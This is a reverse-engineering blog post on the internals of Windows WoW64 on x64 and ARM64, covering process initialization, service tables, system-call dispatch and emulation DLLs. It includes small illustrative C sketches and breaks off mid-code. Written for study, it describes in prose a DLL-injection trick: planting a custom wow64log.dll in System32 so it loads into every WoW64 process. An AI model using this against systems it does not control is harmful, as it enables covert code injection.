WoW64 internals …re-discovering Heaven’s Gate on ARM

( Original text by PetrBenes )

WoW64, short for Windows (32-bit) on Windows (64-bit), is a subsystem that enables 32-bit Windows applications to run on 64-bit Windows. Most people today are familiar with WoW64 on Windows x64, where they can run x86 applications. WoW64 has been with us since Windows XP, and x64 wasn’t the only architecture where WoW64 has been available: it was available on the IA-64 architecture as well, where WoW64 was responsible for emulating x86. More recently, WoW64 has also become available on ARM64, enabling emulation of both x86 and ARM32 applications.

MSDN offers a brief article on WoW64 implementation details. From it we learn that WoW64 consists of (ignoring IA-64):

  • Translation support DLLs:
    • wow64.dll: translation of Nt* system calls (ntoskrnl.exe / ntdll.dll)
    • wow64win.dll: translation of NtGdi*, NtUser* and other GUI-related system calls (win32k.sys / win32u.dll)
  • Emulation support DLLs:
    • wow64cpu.dll: support for running x86 programs on x64
    • wowarmhw.dll: support for running ARM32 programs on ARM64
    • xtajit.dll: support for running x86 programs on ARM64

Besides Nt* system call translation, the wow64.dll provides the core emulation infrastructure.

If you have previous experience with reversing WoW64 on x64, you can notice that it shares plenty of common code with WoW64 subsystem on ARM64. Especially if you peeked into WoW64 of recent x64 Windows, you may have noticed that it actually contains strings such as SysArm32 and that some functions check against IMAGE_FILE_MACHINE_ARMNT (0x1C4) machine type:

[Figure: Wow64SelectSystem32PathInternal found in wow64.dll on Windows x64]
[Figure: Wow64ArchGetSP found in wow64.dll on Windows x64]

WoW64 on x64 systems cannot emulate ARM32 though; it just apparently shares common code. But SysX8664 and SysArm64 sound particularly interesting!

Those similarities can help anyone who is fluent in x86/x64, but less so in ARM. Also, the Hex-Rays decompiler produces much better output for x86/x64 than for ARM32/ARM64.

Initially, my purpose with this blogpost was to get you familiar with how WoW64 works for ARM32 programs on ARM64. But because WoW64 itself changed a lot with Windows 10, and because WoW64 shares some similarities between x64 and ARM64, I decided to briefly get you through how WoW64 works in general.

Everything presented in this article is based on Windows 10 — insider preview, build 18247.

Terms

Throughout this article I’ll be using some terms I’d like to explain beforehand:

  • ntdll or ntdll.dll: these always refer to the native ntdll.dll (x64 on Windows x64, ARM64 on Windows ARM64, …), unless stated otherwise or unless the context indicates otherwise.
  • ntdll32 or ntdll32.dll: to make an easy distinction between the native and the WoW64 ntdll.dll, any WoW64 ntdll.dll will be referred to with the *32 suffix.
  • emu or emu.dll: these represent any of the emulation support DLLs (one of wow64cpu.dll, wowarmhw.dll, xtajit.dll).
  • module!FunctionName: refers to a symbol FunctionName within the module. If you’re familiar with WinDbg, you’re already familiar with this notation.
  • CHPE: “compiled-hybrid-PE”, a new type of PE file, which looks as if it were an x86 PE file, but contains ARM64 code. CHPE will be tackled in more detail in the x86 on ARM64 section.
  • The terms emulation and binary-translation refer to the WoW64 workings and may be used interchangeably.

Kernel

This section shows some points of interest in ntoskrnl.exe related to WoW64 initialization. If you’re interested only in the user-mode part of WoW64, you can skip ahead to the Initialization of the WoW64 process section.

Kernel (initialization)

Initialization of WoW64 begins with the initialization of the kernel:

  • nt!KiSystemStartup
  • nt!KiInitializeKernel
  • nt!InitBootProcessor
  • nt!PspInitPhase0
  • nt!Phase1Initialization
    • nt!IoInitSystem
      • nt!IoInitSystemPreDrivers
      • nt!PsLocateSystemDlls

nt!PsLocateSystemDlls routine takes a pointer named nt!PspSystemDlls, and then calls nt!PspLocateSystemDll in a loop. Let’s figure out what’s going on here:

[Figure: PspSystemDlls (x64)]
[Figure: PspSystemDlls (ARM64)]

nt!PspSystemDlls appears to be an array of pointers to some structure, which holds some NTDLL-related data. The order of these NTDLLs corresponds to this enum (included in the PDB):

typedef enum _SYSTEM_DLL_TYPE
{
    PsNativeSystemDll = 0,
    PsWowX86SystemDll = 1,
    PsWowArm32SystemDll = 2,
    PsWowAmd64SystemDll = 3,
    PsWowChpeX86SystemDll = 4,
    PsVsmEnclaveRuntimeDll = 5,
    PsSystemDllTotalTypes = 6,
} SYSTEM_DLL_TYPE;

Remember this enum, we’ll be needing it again in a while.

Now, let’s see what such a structure looks like:

[Figure: SystemDllData (x64)]
[Figure: SystemDllData (ARM64)]

The nt!PspLocateSystemDll function initializes the fields of this structure. Unfortunately, the layout of this structure isn’t in the PDB, but you can find a reconstructed version in the appendix.

Now let’s get back to the nt!Phase1Initialization — there’s more:

  • ...
  • nt!Phase1Initialization
    • nt!Phase1InitializationIoReady
      • nt!PspInitPhase2
      • nt!PspInitializeSystemDlls

nt!PspInitializeSystemDlls routine takes a pointer named nt!NtdllExportInformation. Let’s look at it:

[Figure: NtdllExportInformation (x64)]
[Figure: NtdllExportInformation (ARM64)]

It looks like it’s some sort of array, again, ordered by the enum _SYSTEM_DLL_TYPE mentioned earlier. Let’s examine NtdllExports:

[Figure: NtdllExportInformation (x64)]

Nothing unexpected: just tuples of function name and function pointer. Did you notice the difference in the number after the NtdllExports field? On x64 it is 19, while on ARM64 it is 14. This number represents the number of items in NtdllExports, and indeed, the two sets differ slightly:

x64                                    | ARM64
(0)  LdrInitializeThunk                | (0)  LdrInitializeThunk
(1)  RtlUserThreadStart                | (1)  RtlUserThreadStart
(2)  KiUserExceptionDispatcher         | (2)  KiUserExceptionDispatcher
(3)  KiUserApcDispatcher               | (3)  KiUserApcDispatcher
(4)  KiUserCallbackDispatcher          | (4)  KiUserCallbackDispatcher
(none)                                 | (5)  KiUserCallbackDispatcherReturn
(5)  KiRaiseUserExceptionDispatcher    | (6)  KiRaiseUserExceptionDispatcher
(6)  RtlpExecuteUmsThread              | (none)
(7)  RtlpUmsThreadYield                | (none)
(8)  RtlpUmsExecuteYieldThreadEnd      | (none)
(9)  ExpInterlockedPopEntrySListEnd    | (7)  ExpInterlockedPopEntrySListEnd
(10) ExpInterlockedPopEntrySListFault  | (8)  ExpInterlockedPopEntrySListFault
(11) ExpInterlockedPopEntrySListResume | (9)  ExpInterlockedPopEntrySListResume
(12) LdrSystemDllInitBlock             | (10) LdrSystemDllInitBlock
(13) RtlpFreezeTimeBias                | (11) RtlpFreezeTimeBias
(14) KiUserInvertedFunctionTable       | (12) KiUserInvertedFunctionTable
(15) WerReportExceptionWorker          | (13) WerReportExceptionWorker
(16) RtlCallEnclaveReturn              | (none)
(17) RtlEnclaveCallDispatch            | (none)
(18) RtlEnclaveCallDispatchReturn      | (none)

We can see that ARM64 is missing Ums (User-Mode Scheduling) and Enclave functions. Also, we can see that ARM64 has one extra function: KiUserCallbackDispatcherReturn.

On the other hand, all NtdllWow*Exports contain the same set of function names:

[Figure: NtdllWowExports (ARM64)]

Notice the names of the second fields of these “structures”: PsWowX86SharedInformation, PsWowChpeX86SharedInformation, … If we look at the addresses of those fields, we can see that they’re part of another array:

[Figure: PsWowX86SharedInformation (ARM64)]

Those addresses are actually the targets of the pointers in the NtdllWow*Exports structure. Also, those function names combined with PsWow*SharedInformation might give you a hint that they’re related to this enum (included in the PDB):

typedef enum _WOW64_SHARED_INFORMATION
{
    SharedNtdll32LdrInitializeThunk = 0,
    SharedNtdll32KiUserExceptionDispatcher = 1,
    SharedNtdll32KiUserApcDispatcher = 2,
    SharedNtdll32KiUserCallbackDispatcher = 3,
    SharedNtdll32RtlUserThreadStart = 4,
    SharedNtdll32pQueryProcessDebugInformationRemote = 5,
    SharedNtdll32BaseAddress = 6,
    SharedNtdll32LdrSystemDllInitBlock = 7,
    SharedNtdll32RtlpFreezeTimeBias = 8,
    Wow64SharedPageEntriesCount = 9,
} WOW64_SHARED_INFORMATION;

Notice how the position of SharedNtdll32BaseAddress correlates with the empty field in the previous screenshot (highlighted). The set of WoW64 NTDLL functions is the same on both x64 and ARM64.

(The C representation of this data can be found in the appendix.)

Now we can tell what the nt!PspInitializeSystemDlls function does: it gets the image base of each NTDLL (nt!PsQuerySystemDllInfo) and resolves all Ntdll*Exports for it (nt!RtlFindExportedRoutineByName). In addition, for WoW64 NTDLLs only (if ((SYSTEM_DLL_TYPE)SystemDllType > PsNativeSystemDll)), it assigns the image base to the SharedNtdll32BaseAddress field of the PsWow*SharedInformation array (nt!PspWow64GetSharedInformation).

Kernel (create process)

Let’s talk briefly about process creation. As you probably already know, the native ntdll.dll is mapped as the first DLL into each created process. This applies to all architectures: x86, x64 and also ARM64. WoW64 processes aren’t an exception to this rule; they share the same initialization code path as native processes.

  • nt!NtCreateUserProcess
  • nt!PspAllocateProcess
    • nt!PspSetupUserProcessAddressSpace
      • nt!PspPrepareSystemDllInitBlock
      • nt!PspWow64SetupUserProcessAddressSpace
  • nt!PspAllocateThread
    • nt!PspWow64InitThread
    • nt!KeInitThread // Entry-point: nt!PspUserThreadStartup
  • nt!PspUserThreadStartup
  • nt!PspInitializeThunkContext
    • nt!KiDispatchException

If you ever wondered how the first user-mode instruction of a newly created process gets executed, now you know the answer: a “synthetic” user-mode exception is dispatched, with ExceptionRecord.ExceptionAddress = &PspLoaderInitRoutine, where PspLoaderInitRoutine points to ntdll!LdrInitializeThunk. This is the first function that is executed in every process, including WoW64 processes.

Initialization of the WoW64 process

The fun part begins!

NOTE: Initialization of wow64.dll is the same on both x64 and ARM64. Any differences will be mentioned.

  • ntdll!LdrInitializeThunk
  • ntdll!LdrpInitialize
  • ntdll!_LdrpInitialize
  • ntdll!LdrpInitializeProcess
  • ntdll!LdrpLoadWow64

The ntdll!LdrpLoadWow64 function is called when the ntdll!UseWOW64 global variable is TRUE, which is set when NtCurrentTeb()->WowTebOffset != NULL.

It constructs the full path to wow64.dll, loads it, and then resolves the following functions:

  • Wow64LdrpInitialize
  • Wow64PrepareForException
  • Wow64ApcRoutine
  • Wow64PrepareForDebuggerAttach
  • Wow64SuspendLocalThread

NOTE: The resolution of these pointers is wrapped in a pair of ntdll!LdrProtectMrdata calls, which unprotect (0) and then protect (1) the .mrdata section, in which these pointers reside. MRDATA (Mutable Read Only Data) is part of the CFG (Control-Flow Guard) functionality. You can look at Alex’s slides for more information.

When these functions are successfully located, the ntdll.dll finally transfers control to the wow64.dll by calling wow64!Wow64LdrpInitialize. Let’s go through the sequence of calls that eventually bring us to the entry-point of the “emulated” application.

  • wow64!Wow64LdrpInitialize
    • wow64!Wow64InfoPtr = (NtCurrentPeb32() + 1)
    • NtCurrentTeb()->TlsSlots[/* 10 */ WOW64_TLS_WOW64INFO] = wow64!Wow64InfoPtr
    • ntdll!RtlWow64GetCpuAreaInfo
    • wow64!ProcessInit
    • wow64!CpuNotifyMapViewOfSection // Process image
    • wow64!Wow64DetectMachineTypeInternal
    • wow64!Wow64SelectSystem32PathInternal
    • wow64!CpuNotifyMapViewOfSection // 32-bit NTDLL image
    • wow64!ThreadInit
    • wow64!ThunkStartupContext64TO32
    • wow64!Wow64SetupInitialCall
    • wow64!RunCpuSimulation
      • emu!BTCpuSimulate

Wow64InfoPtr is the first initialized variable in wow64.dll. It contains data shared between the 32-bit and 64-bit execution modes. Its structure is not documented, although you can find it partially reconstructed in the appendix.

RtlWow64GetCpuAreaInfo is an internal ntdll.dll function which is called a lot during emulation. It is mainly used for fetching the machine type and the architecture-specific CPU context (the CONTEXT structure) of the emulated process. This information is fetched into an undocumented structure, which we’ll be calling WOW64_CPU_AREA_INFO. A pointer to this structure is then given to the ProcessInit function.

Wow64DetectMachineTypeInternal determines the machine type of the executed process and returns it. Wow64SelectSystem32PathInternal selects the “emulated” System32 directory based on that machine type, e.g. SysWOW64 for x86 processes or SysArm32 for ARM32 processes.
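The mapping from machine type to directory name can be sketched as follows. This is a minimal illustration and not the actual wow64.dll code: the function name select_emulated_system_dir and its signature are hypothetical, and only the two mappings named above are covered. The machine type constants are the standard PE/COFF values.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Machine type values as defined by the PE/COFF format. */
#define IMAGE_FILE_MACHINE_I386  0x014c
#define IMAGE_FILE_MACHINE_ARMNT 0x01c4

/*
 * Hypothetical stand-in for the directory selection step. It only covers
 * the two mappings named in the text; the real routine is not reproduced.
 * Returns true and stores the directory name on success.
 */
bool select_emulated_system_dir(uint16_t machine_type, const char **dir_name)
{
    assert(dir_name != NULL);

    switch (machine_type) {
    case IMAGE_FILE_MACHINE_I386:
        *dir_name = "SysWOW64";   /* x86 process */
        return true;
    case IMAGE_FILE_MACHINE_ARMNT:
        *dir_name = "SysArm32";   /* ARM32 process */
        return true;
    default:
        *dir_name = NULL;         /* not covered by this sketch */
        return false;
    }
}
```

Calling select_emulated_system_dir(IMAGE_FILE_MACHINE_ARMNT, &dir) leaves dir pointing at "SysArm32".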

You can also notice calls to CpuNotifyMapViewOfSection function. As the name suggests, it is also called on each “emulated” call of NtMapViewOfSection. This function:

  • Checks if the mapped image is executable
  • Checks if the following conditions are true:
    • NtHeaders->OptionalHeader.MajorSubsystemVersion == USER_SHARED_DATA.NtMajorVersion
    • NtHeaders->OptionalHeader.MinorSubsystemVersion == USER_SHARED_DATA.NtMinorVersion

If these checks pass, the CpupResolveReverseImports function is called. This function checks whether the mapped image exports the Wow64Transition symbol and, if so, stores in it the 32-bit pointer value returned by emu!BTCpuGetBopCode.
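The checks performed before CpupResolveReverseImports can be summarized in a few lines of C. This is only a sketch under simplifying assumptions: the mapped_image and shared_data types and the function name are hypothetical stand-ins for the PE headers and USER_SHARED_DATA, reduced to the fields the checks look at.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Simplified, hypothetical view of the fields the checks look at. */
typedef struct {
    bool     is_executable;            /* image mapped as executable       */
    uint16_t major_subsystem_version;  /* OptionalHeader.MajorSubsystemVersion */
    uint16_t minor_subsystem_version;  /* OptionalHeader.MinorSubsystemVersion */
} mapped_image;

typedef struct {
    uint32_t nt_major_version;         /* USER_SHARED_DATA.NtMajorVersion */
    uint32_t nt_minor_version;         /* USER_SHARED_DATA.NtMinorVersion */
} shared_data;

/* Returns true when the image would be handed to the import resolution. */
bool passes_reverse_import_checks(const mapped_image *image,
                                  const shared_data *shared)
{
    assert(image != NULL && shared != NULL);

    return image->is_executable
        && image->major_subsystem_version == shared->nt_major_version
        && image->minor_subsystem_version == shared->nt_minor_version;
}
```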

Wow64Transition is mostly known to be exported by SysWOW64\ntdll.dll, but there are actually multiple Windows WoW DLLs which export this symbol (they will be mentioned later). You might already be familiar with the term “Heaven’s Gate”: this is where Wow64Transition points on Windows x64, a simple far jump instruction which switches into a long-mode (64-bit) enabled code segment. On ARM64, Wow64Transition points to a “nop” function.

NOTE: Because there are no checks on the ImageName, the Wow64Transition symbol is resolved for all executable images that pass the checks mentioned earlier. If you’re wondering whether Wow64Transition would be resolved for your custom executable or DLL: it indeed would!

The initialization then continues with thread-specific initialization by calling ThreadInit. This is followed by a pair of calls, ThunkStartupContext64TO32(CpuArea.MachineType, CpuArea.Context, NativeContext) and Wow64SetupInitialCall(&CpuArea). These functions perform the necessary setup of the architecture-specific WoW64 CONTEXT structure to prepare the start of execution in the emulated environment. This is done in exactly the same way as if ntoskrnl.exe itself had started the emulated application, i.e.:

  • setting the instruction pointer to the address of ntdll32!LdrInitializeThunk
  • setting the stack pointer below the WoW64 CONTEXT structure
  • setting the 1st parameter to point to that CONTEXT structure
  • setting the 2nd parameter to point to the base address of the ntdll32

Finally, the RunCpuSimulation function is called. This function just calls BTCpuSimulate from the binary-translator DLL, which contains the actual emulation loop that never returns.

wow64!ProcessInit

  • wow64!Wow64ProtectMrdata // 0
  • wow64!Wow64pLoadLogDll
    • ntdll!LdrLoadDll // "%SystemRoot%\system32\wow64log.dll"

wow64.dll also has its own .mrdata section, and ProcessInit begins by unprotecting it. It then tries to load wow64log.dll from the constructed system directory. Note that this DLL is not present in any released Windows installation (it’s probably used internally by Microsoft for debugging the WoW64 subsystem). Therefore, loading this DLL will normally fail. This isn’t a problem, though, because no critical functionality of the WoW64 subsystem depends on it. If the load did succeed, wow64.dll would try to find the following exported functions there:

  • Wow64LogInitialize
  • Wow64LogSystemService
  • Wow64LogMessageArgList
  • Wow64LogTerminate

If any of these functions weren’t exported, the DLL would be immediately unloaded.

If we dropped a custom wow64log.dll (one that exports the functions mentioned above) into the %SystemRoot%\System32 directory, it would actually get loaded into every WoW64 process. This way we could drop in a custom logging DLL, or even inject a native DLL into every WoW64 process!

For more details, you can check my injdrv project which implements injection of native DLLs into WoW64 processes, or check this post by Walied Assar.

Then, certain important values are fetched from the LdrSystemDllInitBlock array. These contain the base address of ntdll32.dll, pointers to functions like ntdll32!KiUserExceptionDispatcher, ntdll32!KiUserApcDispatcher, …, control flow guard information and others.

Finally, Wow64pInitializeFilePathRedirection is called, which (as the name suggests) initializes WoW64 path redirection. The path redirection is implemented entirely in wow64.dll and the mechanism is basically based on string replacement. The path redirection can be disabled and re-enabled by calling the kernel32!Wow64DisableWow64FsRedirection and kernel32!Wow64RevertWow64FsRedirection function pair. Both of these functions internally call ntdll32!RtlWow64EnableFsRedirectionEx, which directly operates on the NtCurrentTeb()->TlsSlots[/* 8 */ WOW64_TLS_FILESYSREDIR] field.
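To give a feeling for what “string replacement” means here, below is a deliberately simplified sketch of prefix-based redirection. It is not the wow64.dll implementation: the function names are hypothetical, the two directory names are hard-coded for illustration, and any exemptions or special cases the real redirector may have are ignored.

```c
#include <assert.h>
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Case-insensitive prefix test; Windows paths are case-insensitive. */
int has_prefix_icase(const char *s, const char *prefix)
{
    for (; *prefix != '\0'; ++s, ++prefix) {
        if (tolower((unsigned char)*s) != tolower((unsigned char)*prefix))
            return 0;
    }
    return 1;
}

/*
 * Returns 1 if the path was redirected, 0 if it was copied unchanged,
 * and -1 if the output buffer is too small. The directory names are
 * hard-coded for illustration only.
 */
int redirect_path(const char *path, char *out, size_t out_size)
{
    static const char from[] = "C:\\Windows\\System32";
    static const char to[]   = "C:\\Windows\\SysWOW64";
    const size_t from_len = strlen(from);
    int redirected = 0;
    int written;

    assert(path != NULL && out != NULL);

    /* Match whole path components only, so "System32x" stays untouched. */
    if (has_prefix_icase(path, from) &&
        (path[from_len] == '\\' || path[from_len] == '\0')) {
        written = snprintf(out, out_size, "%s%s", to, path + from_len);
        redirected = 1;
    } else {
        written = snprintf(out, out_size, "%s", path);
    }

    if (written < 0 || (size_t)written >= out_size)
        return -1;
    return redirected;
}
```

With this sketch, a request for c:\windows\system32\kernel32.dll is rewritten to C:\Windows\SysWOW64\kernel32.dll, while paths outside the redirected directory pass through unchanged.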

wow64!ServiceTables

Next, a ServiceTables array is initialized. You might be already familiar with the KSERVICE_TABLE_DESCRIPTOR from the ntoskrnl.exe, which contains — among other things — a pointer to an array of system functions callable from the user-mode. ntoskrnl.exe contains 2 of these tables: one for ntoskrnl.exe itself and one for the win32k.sys, aka the Windows (GUI) subsystem. wow64.dll has 4 of them!

The WOW64_SERVICE_TABLE_DESCRIPTOR has the exact same structure as the KSERVICE_TABLE_DESCRIPTOR, except that it is extended:

typedef struct _WOW64_ERROR_CASE {
    ULONG Case;
    NTSTATUS TransformedStatus;
} WOW64_ERROR_CASE, *PWOW64_ERROR_CASE;

typedef struct _WOW64_SERVICE_TABLE_DESCRIPTOR {
    KSERVICE_TABLE_DESCRIPTOR Descriptor;
    WOW64_ERROR_CASE ErrorCaseDefault;
    PWOW64_ERROR_CASE ErrorCase;
} WOW64_SERVICE_TABLE_DESCRIPTOR, *PWOW64_SERVICE_TABLE_DESCRIPTOR;

(More detailed definition of this structure is in the appendix.)

ServiceTables array is populated as follows:

  • ServiceTables[/* 0 */ WOW64_NTDLL_SERVICE_INDEX] = sdwhnt32
  • ServiceTables[/* 1 */ WOW64_WIN32U_SERVICE_INDEX] = wow64win!sdwhwin32
  • ServiceTables[/* 2 */ WOW64_KERNEL32_SERVICE_INDEX] = wow64win!sdwhcon
  • ServiceTables[/* 3 */ WOW64_USER32_SERVICE_INDEX] = sdwhbase

NOTE: wow64.dll directly depends (by import table) on two DLLs: the native ntdll.dll and wow64win.dll. This means that wow64win.dll is loaded even into “non-Windows-subsystem” processes, that wouldn’t normally load user32.dll.

These two symbols mentioned above are the only symbols that wow64.dll requires wow64win.dll to export.

Let’s have a look at the sdwhnt32 service table:

[Figure: sdwhnt32 (x64)]
[Figure: sdwhnt32JumpTable (x64)]
[Figure: sdwhnt32Number (x64)]

There is nothing surprising here for those who have already dealt with service tables in ntoskrnl.exe. sdwhnt32JumpTable contains an array of the system call functions, which are traditionally prefixed. WoW64 “system calls” are prefixed with wh*, and I honestly have no idea what it stands for. It might be the same case as with the Zw* prefix: it stands for nothing and is simply used as a unique distinguisher.

The job of these wh* functions is to correctly convert any arguments and return values from the 32-bit version to the native, 64-bit version. Keep in mind that this includes not only the conversion of integers and pointers, but also the content of structures. An interesting note is that each of the wh* functions has only one argument, which is a pointer to an array of 32-bit values. This array contains the parameters passed to the 32-bit system call.
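The calling convention of a wh* function can be illustrated with a small sketch. Everything here is hypothetical: native_example_service stands in for a real 64-bit Nt* function, and the choice of which argument is zero-extended or sign-extended is made up for the example. Only the shape (a single pointer to an array of 32-bit values) comes from the description above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Records what the pretend native service received, for inspection. */
typedef struct {
    uint64_t handle;
    uint64_t buffer_address;
    int64_t  delta;
} native_call_record;

native_call_record last_native_call;

/* Hypothetical 64-bit service standing in for a real Nt* function. */
int32_t native_example_service(uint64_t handle, uint64_t buffer_address,
                               int64_t delta)
{
    last_native_call.handle = handle;
    last_native_call.buffer_address = buffer_address;
    last_native_call.delta = delta;
    return 0; /* STATUS_SUCCESS */
}

/* Hypothetical wh*-style thunk: one argument, the 32-bit argument array. */
int32_t wh_example_service(const uint32_t *args32)
{
    assert(args32 != NULL);

    uint64_t handle         = args32[0];           /* zero-extended          */
    uint64_t buffer_address = args32[1];           /* 32-bit pointer widened */
    int64_t  delta          = (int32_t)args32[2];  /* signed, sign-extended  */

    return native_example_service(handle, buffer_address, delta);
}
```

A real wh* function additionally has to convert any structures the pointers refer to, which this sketch leaves out.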

As you could notice, in those 4 service tables there are “system calls” that are not present in the ntoskrnl.exe. Also, I mentioned earlier that the Wow64Transition is resolved in multiple DLLs. Currently, these DLLs export this symbol:

  • ntdll.dll
  • win32u.dll
  • kernel32.dll and kernelbase.dll
  • user32.dll

The ntdll.dll and win32u.dll are obvious and they represent the same thing as their native counterparts. The service tables used by kernel32.dll and user32.dll contain functions for transformation of particular csrss.exe calls into their 64-bit version.

It’s also worth noting that at the end of the ntdll.dll system table, there are several functions with the NtWow64* prefix, such as NtWow64ReadVirtualMemory64, NtWow64WriteVirtualMemory64 and others. These are special functions which are provided only to WoW64 processes.

One of these special functions is NtWow64CallFunction64. It has its own small dispatch table and callers can select which function should be called based on its index:

[Figure: Wow64FunctionDispatch64 (x64)]

NOTE: I’ll be talking about one of these functions — namely Wow64CallFunctionTurboThunkControl — later in the Disabling Turbo thunks section.

wow64!Wow64SystemServiceEx

This function is similar to the kernel’s nt!KiSystemCall64 — it does the dispatching of the system call. This function is exported by the wow64.dll and imported by the emulation DLLs. Wow64SystemServiceEx accepts 2 arguments:

  • The system call number
  • Pointer to an array of 32-bit arguments passed to the system call (as mentioned earlier)

The system call number isn’t just an index, but also contains index of a system table which needs to be selected (this is also true for ntoskrnl.exe):

typedef struct _WOW64_SYSTEM_SERVICE
{
    USHORT SystemCallNumber : 12;
    USHORT ServiceTableIndex : 4;
} WOW64_SYSTEM_SERVICE, *PWOW64_SYSTEM_SERVICE;

This function then selects ServiceTables[ServiceTableIndex] and calls the appropriate wh* function based on the SystemCallNumber.
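The decoding and dispatch step can be sketched as follows. This is a simplified model rather than the real Wow64SystemServiceEx: the service_table type, the sample handlers and the bounds check that returns STATUS_INVALID_SYSTEM_SERVICE are assumptions made for the example, and the logging and exception handling discussed in this section are left out.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define SERVICE_TABLE_COUNT 4
/* NTSTATUS for an unknown service; returning it here is an assumption. */
#define STATUS_INVALID_SYSTEM_SERVICE ((int32_t)0xC000001CL)

typedef int32_t (*wh_service_fn)(const uint32_t *args32);

typedef struct {
    const wh_service_fn *functions;  /* jump table of wh* routines */
    uint32_t             count;      /* number of entries          */
} service_table;

int32_t dispatch_system_service(const service_table *tables,
                                uint32_t service, const uint32_t *args32)
{
    const uint32_t call_number = service & 0xFFFu;        /* bits 0-11  */
    const uint32_t table_index = (service >> 12) & 0xFu;  /* bits 12-15 */

    assert(tables != NULL);

    if (table_index >= SERVICE_TABLE_COUNT ||
        call_number >= tables[table_index].count)
        return STATUS_INVALID_SYSTEM_SERVICE;

    return tables[table_index].functions[call_number](args32);
}

/* Two made-up handlers so the dispatcher can be exercised. */
int32_t wh_sample_first(const uint32_t *args32)  { return (int32_t)args32[0] + 1; }
int32_t wh_sample_second(const uint32_t *args32) { return (int32_t)args32[0] + 2; }
```

For example, a service value of 0x1001 selects table 1 and entry 1 of that table.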

[Figure: Wow64SystemServiceEx (x64)]

NOTE: If wow64log.dll has been successfully loaded, the Wow64SystemServiceEx function calls Wow64LogSystemServiceWrapper (a wrapper around the wow64log!Wow64LogSystemService function) twice: once before the actual system call and once immediately after it. This can be used for instrumentation of each WoW64 system call! The structure passed to Wow64LogSystemService contains all the important information about the system call: its table index, system call number, the argument list and, on the second call, even the resulting NTSTATUS! You can find the layout of this structure in the appendix (WOW64_LOG_SERVICE).

Finally, as has been mentioned, the WOW64_SERVICE_TABLE_DESCRIPTOR structure differs from KSERVICE_TABLE_DESCRIPTOR in that it contains an ErrorCase table. The code mentioned above is actually wrapped in a SEH __try/__except block. If whService raises an exception, the __except block calls the Wow64HandleSystemServiceError function. This function checks whether the service table that raised the exception has a non-NULL ErrorCase and, if it does, selects the appropriate WOW64_ERROR_CASE for the system call. If ErrorCase is NULL, the values from ErrorCaseDefault are used. The NTSTATUS of the exception is then transformed according to an algorithm which can be found in the appendix.

wow64!ProcessInit (cont.)

  • ...
  • wow64!CpuLoadBinaryTranslator // MachineType
    • wow64!CpuGetBinaryTranslatorPath // MachineType
      • ntdll!NtOpenKey // "\Registry\Machine\Software\Microsoft\Wow64\"
      • ntdll!NtQueryValueKey // "arm" / "x86"
      • ntdll!RtlGetNtSystemRoot // "arm" / "x86"
      • ntdll!RtlUnicodeStringPrintf // "%ws\system32\%ws"

As you’ve probably guessed, this function constructs the path to the binary-translator DLL, which is (on x64) known as wow64cpu.dll. This DLL will be responsible for the actual low-level emulation.

[Figure: \Registry\Machine\Software\Microsoft\Wow64\x86 (x64)]
[Figure: \Registry\Machine\Software\Microsoft\Wow64\arm (ARM64)]
[Figure: \Registry\Machine\Software\Microsoft\Wow64\x86 (ARM64)]

We can see that there is no wow64cpu.dll on ARM64. Instead, there is xtajit.dll used for x86 emulation and wowarmhw.dll used for ARM32 emulation.

NOTE: The CpuGetBinaryTranslatorPath function is same on both x64 and ARM64 except for one peculiar difference: on Windows x64, if the \Registry\Machine\Software\Microsoft\Wow64\x86 key cannot be opened (is missing/was deleted), the function contains a fallback to load wow64cpu.dll. On Windows ARM64, though, it doesn’t have such fallback and if the registry key is missing, the function fails and the WoW64 process is terminated.
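The path construction, including the difference in fallback behaviour, can be modelled like this. It is a sketch, not the real CpuGetBinaryTranslatorPath: the function name and parameters are hypothetical, narrow strings are used instead of wide ones, and the registry lookup is represented only by its result (registry_value, or NULL when the key cannot be opened).

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>

/*
 * registry_value: DLL name read from the registry, or NULL if the key
 *                 could not be opened.
 * fallback:       name to use when the registry lookup failed, or NULL
 *                 when there is no fallback (the ARM64 behaviour).
 * Returns the length of the resulting path, or -1 on failure.
 */
int build_translator_path(char *out, size_t out_size,
                          const char *system_root,
                          const char *registry_value,
                          const char *fallback)
{
    const char *dll_name = registry_value != NULL ? registry_value : fallback;
    int written;

    assert(out != NULL && system_root != NULL);

    if (dll_name == NULL)
        return -1;  /* no registry value and no fallback */

    /* Same shape as the "%ws\system32\%ws" format string shown above. */
    written = snprintf(out, out_size, "%s\\system32\\%s", system_root, dll_name);
    return (written < 0 || (size_t)written >= out_size) ? -1 : written;
}
```

On x64 the caller would pass "wow64cpu.dll" as the fallback; on ARM64 it would pass NULL, so a missing registry key makes the call fail.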

wow64.dll then loads the selected DLL and tries to find the following exported functions there:

BTCpuProcessInit (!) BTCpuProcessTerm
BTCpuThreadInit BTCpuThreadTerm
BTCpuSimulate (!) BTCpuResetFloatingPoint
BTCpuResetToConsistentState BTCpuNotifyDllLoad
BTCpuNotifyDllUnload BTCpuPrepareForDebuggerAttach
BTCpuNotifyBeforeFork BTCpuNotifyAfterFork
BTCpuNotifyAffinityChange BTCpuSuspendLocalThread
BTCpuIsProcessorFeaturePresent BTCpuGetBopCode (!)
BTCpuGetContext BTCpuSetContext
BTCpuTurboThunkControl BTCpuNotifyMemoryAlloc
BTCpuNotifyMemoryFree BTCpuNotifyMemoryProtect
BTCpuFlushInstructionCache2 BTCpuNotifyMapViewOfSection
BTCpuNotifyUnmapViewOfSection BTCpuUpdateProcessorInformation
BTCpuNotifyReadFile BTCpuCfgDispatchControl
BTCpuUseChpeFile BTCpuOptimizeChpeImportThunks
BTCpuNotifyProcessExecuteFlagsChange BTCpuProcessDebugEvent
BTCpuFlushInstructionCacheHeavy

Interestingly, not all functions need to be found: only those marked with “(!)” are required, the rest are optional. As a next step, the resolved BTCpuProcessInit function is called, which performs binary-translator-specific process initialization. We’ll cover that in a later section.
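The required-versus-optional rule can be expressed as a short loop. This sketch is not taken from wow64.dll: the export_entry type, the lookup callback and the sample translator that exports only two names are hypothetical and exist purely to make the rule concrete.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

typedef void (*export_fn)(void);

typedef struct {
    const char *name;
    bool        required;  /* true for the entries marked "(!)" */
    export_fn   address;   /* filled in by resolve_exports()    */
} export_entry;

/* Hypothetical lookup callback; a real loader would walk the export table. */
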